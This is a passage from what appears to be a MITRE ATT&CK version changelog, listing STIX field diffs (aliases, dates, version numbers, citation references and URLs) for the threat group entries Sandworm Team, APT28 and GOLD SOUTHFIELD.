external_references[12]['url']https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html
external_references[13]['source_name']InfoSecurity Sandworm Oct 2014CrowdStrike VOODOO BEAR
external_references[13]['description']Muncaster, P.. (2014, October 14). Microsoft Zero Day Traced to Russian ‘Sandworm’ Hackers. Retrieved October 6, 2017.Meyers, A. (2018, January 19). Meet CrowdStrike’s Adversary of the Month for January: VOODOO BEAR. Retrieved May 22, 2018.
external_references[13]['url']https://www.infosecurity-magazine.com/news/microsoft-zero-day-traced-russian/https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/
external_references[14]['source_name']NCSC Sandworm Feb 2020Microsoft Prestige ransomware October 2022
external_references[14]['description']NCSC. (2020, February 20). NCSC supports US advisory regarding GRU intrusion set Sandworm. Retrieved June 10, 2020.MSTIC. (2022, October 14). New “Prestige” ransomware impacts organizations in Ukraine and Poland. Retrieved January 19, 2023.
external_references[14]['url']https://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisoryhttps://www.microsoft.com/en-us/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/
external_references[15]['source_name']USDOJ Sandworm Feb 2020InfoSecurity Sandworm Oct 2014
external_references[15]['description']Pompeo, M. (2020, February 20). The United States Condemns Russian Cyber Attack Against the Country of Georgia. Retrieved June 18, 2020.Muncaster, P.. (2014, October 14). Microsoft Zero Day Traced to Russian ‘Sandworm’ Hackers. Retrieved October 6, 2017.
external_references[15]['url']https://2017-2021.state.gov/the-united-states-condemns-russian-cyber-attack-against-the-country-of-georgia//index.htmlhttps://www.infosecurity-magazine.com/news/microsoft-zero-day-traced-russian/
external_references[16]['source_name']US District Court Indictment GRU Unit 74455 October 2020NCSC Sandworm Feb 2020
external_references[16]['description']Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020.NCSC. (2020, February 20). NCSC supports US advisory regarding GRU intrusion set Sandworm. Retrieved June 10, 2020.
external_references[16]['url']https://www.justice.gov/opa/press-release/file/1328521/downloadhttps://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisory
external_references[17]['source_name']Secureworks IRON VIKING USDOJ Sandworm Feb 2020
external_references[17]['description']Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020.Pompeo, M. (2020, February 20). The United States Condemns Russian Cyber Attack Against the Country of Georgia. Retrieved June 18, 2020.
external_references[17]['url']https://www.secureworks.com/research/threat-profiles/iron-vikinghttps://2017-2021.state.gov/the-united-states-condemns-russian-cyber-attack-against-the-country-of-georgia//index.html
external_references[18]['source_name']UK NCSC Olympic Attacks October 2020US District Court Indictment GRU Unit 74455 October 2020
external_references[18]['description']UK NCSC. (2020, October 19). UK exposes series of Russian cyber attacks against Olympic and Paralympic Games . Retrieved November 30, 2020.Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020.
external_references[18]['url']https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-gameshttps://www.justice.gov/opa/press-release/file/1328521/download
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version2.23.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesIRIDIUM
external_references{'source_name': 'Secureworks IRON VIKING ', 'description': 'Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020.', 'url': 'https://www.secureworks.com/research/threat-profiles/iron-viking'}
external_references{'source_name': 'UK NCSC Olympic Attacks October 2020', 'description': 'UK NCSC. (2020, October 19). UK exposes series of Russian cyber attacks against Olympic and Paralympic Games . Retrieved November 30, 2020.', 'url': 'https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games'}
Patches

[G0007] APT28

Current version: 4.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
external_referenceshttps://www.accenture.com/t20181129T203820Z__w__/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50
external_referenceshttps://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/
external_referenceshttps://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/
values_changed
STIX FieldOld valueNew Value
modified2022-03-16 18:08:13.958000+00:002023-03-26 17:51:20.401000+00:00
external_references[1]['source_name']APT28SNAKEMACKEREL
external_references[1]['description'](Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: Crowdstrike DNC June 2016) (Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 3) (Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)(Citation: Accenture SNAKEMACKEREL Nov 2018)
external_references[2]['source_name']IRON TWILIGHTFancy Bear
external_references[2]['description'](Citation: Secureworks IRON TWILIGHT Profile)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)(Citation: Crowdstrike DNC June 2016)(Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
external_references[3]['source_name']SNAKEMACKERELTsar Team
external_references[3]['description'](Citation: Accenture SNAKEMACKEREL Nov 2018)(Citation: ESET Sednit Part 3)(Citation: Talos Seduploader Oct 2017)(Citation: Talos Seduploader Oct 2017)
external_references[4]['source_name']SwallowtailAPT28
external_references[4]['description'](Citation: Symantec APT28 Oct 2018)(Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: Crowdstrike DNC June 2016) (Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 3) (Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
external_references[5]['source_name']Group 74STRONTIUM
external_references[5]['description'](Citation: Talos Seduploader Oct 2017)(Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Microsoft STRONTIUM Aug 2019)(Citation: Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020)(Citation: TrendMicro Pawn Storm Dec 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
external_references[6]['source_name']SednitIRON TWILIGHT
external_references[6]['description']This designation has been used in reporting both to refer to the threat group and its associated malware [JHUHUGIT](https://attack.mitre.org/software/S0044).(Citation: FireEye APT28 January 2017)(Citation: SecureWorks TG-4127)(Citation: Kaspersky Sofacy)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Secureworks IRON TWILIGHT Profile)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)
external_references[7]['source_name']SofacyThreat Group-4127
external_references[7]['description']This designation has been used in reporting both to refer to the threat group and its associated malware.(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: Crowdstrike DNC June 2016)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: SecureWorks TG-4127)
external_references[8]['source_name']Pawn StormTG-4127
external_references[8]['description'](Citation: SecureWorks TG-4127)(Citation: ESET Sednit Part 3)(Citation: TrendMicro Pawn Storm Dec 2020) (Citation: SecureWorks TG-4127)
external_references[9]['source_name']Fancy BearPawn Storm
external_references[9]['description'](Citation: Crowdstrike DNC June 2016)(Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)(Citation: SecureWorks TG-4127)(Citation: ESET Sednit Part 3)(Citation: TrendMicro Pawn Storm Dec 2020)
external_references[10]['source_name']STRONTIUMSwallowtail
external_references[10]['description'](Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Microsoft STRONTIUM Aug 2019)(Citation: Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020)(Citation: TrendMicro Pawn Storm Dec 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)(Citation: Symantec APT28 Oct 2018)
external_references[11]['source_name']Tsar TeamGroup 74
external_references[11]['description'](Citation: ESET Sednit Part 3)(Citation: Talos Seduploader Oct 2017)(Citation: Talos Seduploader Oct 2017)(Citation: Talos Seduploader Oct 2017)
external_references[12]['source_name']Threat Group-4127Accenture SNAKEMACKEREL Nov 2018
external_references[12]['description'](Citation: SecureWorks TG-4127)Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019.
external_references[13]['source_name']TG-4127Crowdstrike DNC June 2016
external_references[13]['description'](Citation: SecureWorks TG-4127)Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.
external_references[14]['source_name']NSA/FBI Drovorub August 2020US District Court Indictment GRU Oct 2018
external_references[14]['description']NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020.Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.
external_references[14]['url']https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDFhttps://www.justice.gov/opa/page/file/1098481/download
external_references[15]['source_name']Cybersecurity Advisory GRU Brute Force Campaign July 2021GRIZZLY STEPPE JAR
external_references[15]['description']NSA, CISA, FBI, NCSC. (2021, July). Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. Retrieved July 26, 2021.Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE – Russian Malicious Cyber Activity. Retrieved January 11, 2017.
external_references[15]['url']https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDFhttps://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf
external_references[16]['source_name']DOJ GRU Indictment Jul 2018ESET Zebrocy May 2019
external_references[16]['description']Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018.ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019.
external_references[16]['url']https://www.justice.gov/file/1080281/downloadhttps://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/
external_references[17]['source_name']Ars Technica GRU indictment Jul 2018ESET Sednit Part 3
external_references[17]['description']Gallagher, S. (2018, July 27). How they did it (and will likely try again): GRU hackers vs. US elections. Retrieved September 13, 2018.ESET. (2016, October). En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016.
external_references[17]['url']https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf
external_references[18]['source_name']Crowdstrike DNC June 2016Sofacy DealersChoice
external_references[18]['description']Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.Falcone, R. (2018, March 15). Sofacy Uses DealersChoice to Target European Government Agency. Retrieved June 4, 2018.
external_references[18]['url']https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/
external_references[19]['source_name']FireEye APT28FireEye APT28 January 2017
external_references[19]['description']FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017.
external_references[19]['url']https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdfhttps://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf
external_references[20]['source_name']SecureWorks TG-4127FireEye APT28
external_references[20]['description']SecureWorks Counter Threat Unit Threat Intelligence. (2016, June 16). Threat Group-4127 Targets Hillary Clinton Presidential Campaign. Retrieved August 3, 2016.FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.
external_references[20]['url']https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaignhttps://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
external_references[21]['source_name']FireEye APT28 January 2017Ars Technica GRU indictment Jul 2018
external_references[21]['description']FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017.Gallagher, S. (2018, July 27). How they did it (and will likely try again): GRU hackers vs. US elections. Retrieved September 13, 2018.
external_references[21]['url']https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdfhttps://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/
external_references[22]['source_name']GRIZZLY STEPPE JARTrendMicro Pawn Storm Dec 2020
external_references[22]['description']Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE – Russian Malicious Cyber Activity. Retrieved January 11, 2017.Hacquebord, F., Remorin, L. (2020, December 17). Pawn Storm’s Lack of Sophistication as a Strategy. Retrieved January 13, 2021.
external_references[22]['url']https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdfhttps://www.trendmicro.com/en_us/research/20/l/pawn-storm-lack-of-sophistication-as-a-strategy.html
external_references[23]['source_name']Sofacy DealersChoiceSecurelist Sofacy Feb 2018
external_references[23]['description']Falcone, R. (2018, March 15). Sofacy Uses DealersChoice to Target European Government Agency. Retrieved June 4, 2018.Kaspersky Lab's Global Research & Analysis Team. (2018, February 20). A Slice of 2017 Sofacy Activity. Retrieved November 27, 2018.
external_references[23]['url']https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/https://securelist.com/a-slice-of-2017-sofacy-activity/83930/
external_references[24]['source_name']Palo Alto Sofacy 06-2018Kaspersky Sofacy
external_references[24]['description']Lee, B., Falcone, R. (2018, June 06). Sofacy Group’s Parallel Attacks. Retrieved June 18, 2018.Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.
external_references[24]['url']https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
external_references[25]['source_name']Symantec APT28 Oct 2018Palo Alto Sofacy 06-2018
external_references[25]['description']Symantec Security Response. (2018, October 04). APT28: New Espionage Operations Target Military and Government Organizations. Retrieved November 14, 2018.Lee, B., Falcone, R. (2018, June 06). Sofacy Group’s Parallel Attacks. Retrieved June 18, 2018.
external_references[25]['url']https://www.symantec.com/blogs/election-security/apt28-espionage-military-governmenthttps://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/
external_references[26]['source_name']ESET Zebrocy May 2019Talos Seduploader Oct 2017
external_references[26]['description']ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019.Mercer, W., et al. (2017, October 22). "Cyber Conflict" Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018.
external_references[26]['url']https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/https://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html
external_references[27]['source_name']US District Court Indictment GRU Oct 2018Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020
external_references[27]['description']Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.Microsoft Threat Intelligence Center (MSTIC). (2020, September 10). STRONTIUM: Detecting new patterns in credential harvesting. Retrieved September 11, 2020.
external_references[27]['url']https://www.justice.gov/opa/page/file/1098481/downloadhttps://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/
external_references[28]['source_name']Kaspersky SofacyMicrosoft STRONTIUM Aug 2019
external_references[28]['description']Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.MSRC Team. (2019, August 5). Corporate IoT – a path to intrusion. Retrieved August 16, 2019.
external_references[28]['url']https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/
external_references[29]['source_name']ESET Sednit Part 3DOJ GRU Indictment Jul 2018
external_references[29]['description']ESET. (2016, October). En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016.Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018.
external_references[29]['url']http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdfhttps://www.justice.gov/file/1080281/download
external_references[30]['source_name']Talos Seduploader Oct 2017Cybersecurity Advisory GRU Brute Force Campaign July 2021
external_references[30]['description']Mercer, W., et al. (2017, October 22). "Cyber Conflict" Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018.NSA, CISA, FBI, NCSC. (2021, July). Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. Retrieved July 26, 2021.
external_references[30]['url']https://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.htmlhttps://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF
external_references[31]['source_name']Securelist Sofacy Feb 2018NSA/FBI Drovorub August 2020
external_references[31]['description']Kaspersky Lab's Global Research & Analysis Team. (2018, February 20). A Slice of 2017 Sofacy Activity. Retrieved November 27, 2018.NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020.
external_references[31]['url']https://securelist.com/a-slice-of-2017-sofacy-activity/83930/https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF
external_references[32]['source_name']Secureworks IRON TWILIGHT ProfileSecureWorks TG-4127
external_references[32]['description']Secureworks CTU. (n.d.). IRON TWILIGHT. Retrieved February 28, 2022.SecureWorks Counter Threat Unit Threat Intelligence. (2016, June 16). Threat Group-4127 Targets Hillary Clinton Presidential Campaign. Retrieved August 3, 2016.
external_references[32]['url']https://www.secureworks.com/research/threat-profiles/iron-twilighthttps://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign
external_references[34]['source_name']Accenture SNAKEMACKEREL Nov 2018Secureworks IRON TWILIGHT Profile
external_references[34]['description']Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019.Secureworks CTU. (n.d.). IRON TWILIGHT. Retrieved February 28, 2022.
external_references[34]['url']https://www.accenture.com/t20181129T203820Z__w__/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50https://www.secureworks.com/research/threat-profiles/iron-twilight
external_references[35]['source_name']TrendMicro Pawn Storm Dec 2020Symantec APT28 Oct 2018
external_references[35]['description']Hacquebord, F., Remorin, L. (2020, December 17). Pawn Storm’s Lack of Sophistication as a Strategy. Retrieved January 13, 2021.Symantec Security Response. (2018, October 04). APT28: New Espionage Operations Target Military and Government Organizations. Retrieved November 14, 2018.
external_references[35]['url']https://www.trendmicro.com/en_us/research/20/l/pawn-storm-lack-of-sophistication-as-a-strategy.htmlhttps://www.symantec.com/blogs/election-security/apt28-espionage-military-government
external_references[36]['source_name']Microsoft STRONTIUM Aug 2019Sednit
external_references[36]['description']MSRC Team. (2019, August 5). Corporate IoT – a path to intrusion. Retrieved August 16, 2019.This designation has been used in reporting both to refer to the threat group and its associated malware [JHUHUGIT](https://attack.mitre.org/software/S0044).(Citation: FireEye APT28 January 2017)(Citation: SecureWorks TG-4127)(Citation: Kaspersky Sofacy)(Citation: Ars Technica GRU indictment Jul 2018)
external_references[37]['source_name']Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020Sofacy
external_references[37]['description']Microsoft Threat Intelligence Center (MSTIC). (2020, September 10). STRONTIUM: Detecting new patterns in credential harvesting. Retrieved September 11, 2020.This designation has been used in reporting both to refer to the threat group and its associated malware.(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: Crowdstrike DNC June 2016)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)

ics-attack

Major Version Changes

[G0115] GOLD SOUTHFIELD

Current version: 2.0

Version changed from: 1.1 → 2.0


Old Description
New Description
t1[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) is t1[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) is 
>a financially motivated threat group active since at least 2>a financially motivated threat group active since at least 2
>019 that operates the [REvil](https://attack.mitre.org/softw>018 that operates the [REvil](https://attack.mitre.org/softw
>are/S0496) Ransomware-as-a Service (RaaS). [GOLD SOUTHFIELD]>are/S0496) Ransomware-as-a Service (RaaS). [GOLD SOUTHFIELD]
>(https://attack.mitre.org/groups/G0115) provides backend inf>(https://attack.mitre.org/groups/G0115) provides backend inf
>rastructure for affiliates recruited on underground forums t>rastructure for affiliates recruited on underground forums t
>o perpetrate high value deployments.(Citation: Secureworks R>o perpetrate high value deployments. By early 2020, [GOLD SO
>Evil September 2019)(Citation: Secureworks GandCrab and REvi>UTHFIELD](https://attack.mitre.org/groups/G0115) started cap
>l September 2019)(Citation: Secureworks GOLD SOUTHFIELD)>italizing on the new trend of stealing data and further exto
 >rting the victim to pay for their data to not get publicly l
 >eaked.(Citation: Secureworks REvil September 2019)(Citation:
 > Secureworks GandCrab and REvil September 2019)(Citation: Se
 >cureworks GOLD SOUTHFIELD)(Citation: CrowdStrike Evolution o
 >f Pinchy Spider July 2021)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://www.secureworks.com/research/revil-sodinokibi-ransomware
values_changed
STIX FieldOld valueNew Value
modified2021-04-26 12:52:34.528000+00:002023-03-28 20:49:53.223000+00:00
description[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) is a financially motivated threat group active since at least 2019 that operates the [REvil](https://attack.mitre.org/software/S0496) Ransomware-as-a Service (RaaS). [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) provides backend infrastructure for affiliates recruited on underground forums to perpetrate high value deployments.(Citation: Secureworks REvil September 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Secureworks GOLD SOUTHFIELD)[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) is a financially motivated threat group active since at least 2018 that operates the [REvil](https://attack.mitre.org/software/S0496) Ransomware-as-a Service (RaaS). [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) provides backend infrastructure for affiliates recruited on underground forums to perpetrate high value deployments. By early 2020, [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) started capitalizing on the new trend of stealing data and further extorting the victim to pay for their data to not get publicly leaked.(Citation: Secureworks REvil September 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Secureworks GOLD SOUTHFIELD)(Citation: CrowdStrike Evolution of Pinchy Spider July 2021)
external_references[1]['source_name']Secureworks REvil September 2019Pinchy Spider
external_references[1]['description']Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020.(Citation: CrowdStrike Evolution of Pinchy Spider July 2021)
external_references[2]['source_name']Secureworks GandCrab and REvil September 2019Secureworks REvil September 2019
external_references[2]['description']Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020.Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020.
external_references[2]['url']https://www.secureworks.com/blog/revil-the-gandcrab-connectionhttps://www.secureworks.com/research/revil-sodinokibi-ransomware
external_references[3]['source_name']Secureworks GOLD SOUTHFIELDCrowdStrike Evolution of Pinchy Spider July 2021
external_references[3]['description']Secureworks. (n.d.). GOLD SOUTHFIELD. Retrieved October 6, 2020.Meyers, Adam. (2021, July 6). The Evolution of PINCHY SPIDER from GandCrab to REvil. Retrieved March 28, 2023.
external_references[3]['url']https://www.secureworks.com/research/threat-profiles/gold-southfieldhttps://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/
x_mitre_version1.12.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesPinchy Spider
external_references{'source_name': 'Secureworks GandCrab and REvil September 2019', 'description': 'Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020.', 'url': 'https://www.secureworks.com/blog/revil-the-gandcrab-connection'}
external_references{'source_name': 'Secureworks GOLD SOUTHFIELD', 'description': 'Secureworks. (n.d.). GOLD SOUTHFIELD. Retrieved October 6, 2020.', 'url': 'https://www.secureworks.com/research/threat-profiles/gold-southfield'}

[G0034] Sandworm Team

Current version: 3.0

Version changed from: 2.2 → 3.0

Details
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://www.justice.gov/opa/page/file/1098481/download
values_changed
STIX FieldOld valueNew Value
modified2022-10-12 20:11:40.313000+00:002023-03-08 22:12:31.238000+00:00
external_references[5]['source_name']BlackEnergy (Group)IRIDIUM
external_references[5]['description'](Citation: NCSC Sandworm Feb 2020)(Citation: UK NCSC Olympic Attacks October 2020)(Citation: Microsoft Prestige ransomware October 2022)
external_references[6]['source_name']TelebotsBlackEnergy (Group)
external_references[6]['description'](Citation: NCSC Sandworm Feb 2020)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)(Citation: NCSC Sandworm Feb 2020)(Citation: UK NCSC Olympic Attacks October 2020)
external_references[7]['source_name']IRON VIKINGTelebots
external_references[7]['description'](Citation: Secureworks IRON VIKING )(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)(Citation: NCSC Sandworm Feb 2020)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)
external_references[8]['source_name']US District Court Indictment GRU Oct 2018IRON VIKING
external_references[8]['description']Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.(Citation: Secureworks IRON VIKING )(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)
external_references[9]['source_name']Dragos ELECTRUMUS District Court Indictment GRU Oct 2018
external_references[9]['description']Dragos. (2017, January 1). ELECTRUM Threat Profile. Retrieved June 10, 2020.Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.
external_references[9]['url']https://www.dragos.com/resource/electrum/https://www.justice.gov/opa/page/file/1098481/download
external_references[10]['source_name']F-Secure BlackEnergy 2014Dragos ELECTRUM
external_references[10]['description']F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.Dragos. (2017, January 1). ELECTRUM Threat Profile. Retrieved June 10, 2020.
external_references[10]['url']https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdfhttps://www.dragos.com/resource/electrum/
external_references[11]['source_name']iSIGHT Sandworm 2014F-Secure BlackEnergy 2014
external_references[11]['description']Hultquist, J.. (2016, January 7). Sandworm Team and the Ukrainian Power Authority Attacks. Retrieved October 6, 2017.F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.
external_references[11]['url']https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.htmlhttps://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf
external_references[12]['source_name']CrowdStrike VOODOO BEARiSIGHT Sandworm 2014
external_references[12]['description']Meyers, A. (2018, January 19). Meet CrowdStrike’s Adversary of the Month for January: VOODOO BEAR. Retrieved May 22, 2018.Hultquist, J.. (2016, January 7). Sandworm Team and the Ukrainian Power Authority Attacks. Retrieved October 6, 2017.
external_references[12]['url']https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html
external_references[13]['source_name']InfoSecurity Sandworm Oct 2014CrowdStrike VOODOO BEAR
